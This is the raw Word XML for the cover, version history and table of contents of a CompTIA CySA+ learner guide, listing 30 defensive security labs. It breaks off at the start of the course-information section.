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8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tertiary_logo.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1371600" cy="1371600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="161B26"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Tertiary Infotech Academy Pte Ltd</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="5B6372"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>UEN: 201200696W</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>LEARNER GUIDE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="5B6372"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>For</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="1188720" cy="1188720"/>
            <wp:docPr id="2" name="Picture 2"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="cysa_logo.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1188720" cy="1188720"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="161B26"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>CompTIA Cybersecurity Analyst (CySA+) Training</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>TGS Ref No: TGS-2024049211</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="5B6372"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Conducted by</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="161B26"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Tertiary Infotech Academy Pte Ltd</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="5B6372"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>UEN: 201200696W</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Version 2.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Document Version Control Record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152"/>
            <w:shd w:val="clear" w:fill="1F6FEB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:val="clear" w:fill="1F6FEB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Effective Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5184"/>
            <w:shd w:val="clear" w:fill="1F6FEB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Summary of Changes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2016"/>
            <w:shd w:val="clear" w:fill="1F6FEB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Author</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>6 July 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5184"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>First edition — Learner Guide aligned to the 30 hands-on CySA+ CS0-003 labs (Killercoda + free tools), with step-by-step instructions, reference diagrams and per-lab learning outcomes.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2016"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Tertiary Infotech Academy Pte Ltd</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>2.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>18 Aug 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5184"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Second edition — aligned to the v7 Slides deck: theory content reordered to the four CS0-003 exam domains, practice exam and CompTIA CySA+ exam registration sections added.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2016"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Tertiary Infotech Academy Pte Ltd</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>2.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>18 Aug 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5184"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>House-format fixes — Goal and Test-it boxes added to every lab, markdown tables rendered as Word tables, list numbering restarted per list, Table of Contents and 11pt body applied.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2016"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Tertiary Infotech Academy Pte Ltd</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Table of Contents</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
        <w:instrText xml:space="preserve">TOC \o "1-3" \h \z \u</w:instrText>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Course Information</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Topic 1: Security Operations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="5B6372"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Lab 1 — Log Ingestion and Time Synchronization</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="5B6372"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Lab 2 — OS Hardening and System Process Inspection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="5B6372"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Lab 3 — Network Segmentation and Zero Trust</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="5B6372"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Lab 4 — Detecting Malicious Network Activity</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="5B6372"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Lab 5 — Host-Based IOC Hunting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="5B6372"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Lab 6 — Packet Capture for Threat Hunting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="5B6372"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Lab 7 — SIEM Log Correlation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="5B6372"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Lab 8 — Email Header Analysis (SPF/DKIM/DMARC)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="5B6372"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Lab 9 — Malware Triage with Hashing and VirusTotal</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="5B6372"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Lab 10 — Threat Intelligence and MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Topic 2: Vulnerability Management</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="5B6372"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Lab 11 — Asset Discovery with Nmap</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="5B6372"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Lab 12 — Vulnerability Scanning with OpenVAS (Greenbone CE)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="5B6372"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Lab 13 — Web App Scanning with OWASP ZAP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="5B6372"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Lab 14 — Web Recon with Nikto and Burp Suite</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="5B6372"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Lab 15 — Metasploit Framework Basics</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="5B6372"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Lab 16 — CVSS Scoring and Prioritization</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="5B6372"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Lab 17 — Exploiting and Mitigating XSS and SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="5B6372"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Lab 18 — Patch Management and Hardening</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="5B6372"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Lab 19 — Attack Surface Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Topic 3: Incident Response and Management</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="5B6372"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Lab 20 — Cyber Kill Chain and ATT&amp;CK Mapping</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="5B6372"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Lab 21 — Evidence Acquisition and Chain of Custody</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="5B6372"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Lab 22 — Memory Forensics with Volatility</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="5B6372"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Lab 23 — Log Analysis for Incident Response</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="5B6372"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Lab 24 — Containment with Host Isolation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="5B6372"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Lab 25 — Incident Response Playbook and Tabletop</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Topic 4: Reporting and Communication</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="5B6372"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Lab 26 — Vulnerability Management Report</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="5B6372"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Lab 27 — Executive Incident Report</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="5B6372"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Lab 28 — Security Metrics Dashboard (MTTD / MTTR)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="5B6372"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Lab 29 — Compliance Reporting (PCI DSS / ISO 27001 / NIST CSF)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="5B6372"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Lab 30 — Stakeholder Communication and Lessons Learned</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Course Information</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Welcome! This Learner Guide takes you click-by-click through every hands-on lab in the WSQ CompTIA Cybersecurity Analyst (CySA+) Training (Course Code: TGS-2024049211). Across four domains you will build practical, job-ready skills in security operations, vulnerability management, incident response, and reporting — each mapped to the CompTIA CySA+ CS0-003 exam objectives.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:shd w:val="clear" w:fill="FDF3E7"/>
        <w:ind w:left="144" w:right="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="C87A1E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Note: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
